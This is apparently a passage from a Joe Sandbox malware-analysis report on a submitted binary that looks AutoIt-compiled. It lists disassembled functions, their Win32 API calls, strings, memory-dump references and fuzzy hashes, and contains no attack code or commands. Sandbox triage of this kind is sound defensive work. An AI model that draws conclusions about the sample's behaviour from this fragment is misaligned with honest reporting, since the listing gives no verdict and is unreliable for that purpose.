                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                            • String ID:
                                                            • API String ID: 3413494760-0
                                                            • Opcode ID: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                            • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                            • Opcode Fuzzy Hash: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                            • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                            Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressProc_free_malloc$_strcat_strlen
                                                            • String ID: AU3_FreeVar
                                                            • API String ID: 2634073740-771828931
                                                            • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                            • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                            • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                            • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                            Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32 ref: 0046C63A
                                                            • CoUninitialize.OLE32 ref: 0046C645
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                              • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                            • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                            • IIDFromString.OLE32(?,?), ref: 0046C705
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 2294789929-1287834457
                                                            • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                            • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                            • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                            • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                            Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                              • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                            • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                            • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                            • ReleaseCapture.USER32 ref: 0047116F
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 2483343779-2107944366
                                                            • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                            • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                            • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                            • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                            Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                            • _wcslen.LIBCMT ref: 00450720
                                                            • _wcscat.LIBCMT ref: 00450733
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                            • String ID: -----$SysListView32
                                                            • API String ID: 4008455318-3975388722
                                                            • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                            • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                            • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                            • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                            Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                            • GetParent.USER32 ref: 00469C98
                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                            • GetParent.USER32 ref: 00469CBC
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2360848162-1403004172
                                                            • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                            • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                            • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                            • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                            Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                            • String ID:
                                                            • API String ID: 262282135-0
                                                            • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                            • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                            • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                            • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                            Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                            • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                            • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                            • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                            Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                            • String ID:
                                                            • API String ID: 3771399671-0
                                                            • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                            • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                            • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                            • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                            Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                            • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                            • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                            • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                            • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                            Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 0-1603158881
                                                            • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                            • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                            • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                            • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                            Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateMenu.USER32 ref: 00448603
                                                            • SetMenu.USER32(?,00000000), ref: 00448613
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                            • IsMenu.USER32(?), ref: 004486AB
                                                            • CreatePopupMenu.USER32 ref: 004486B5
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                            • DrawMenuBar.USER32 ref: 004486F5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID: 0
                                                            • API String ID: 161812096-4108050209
                                                            • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                            • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                            • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                            • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                            Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                            • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                            • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                            • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                            Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                            • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                            • String ID:
                                                            • API String ID: 978794511-0
                                                            • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
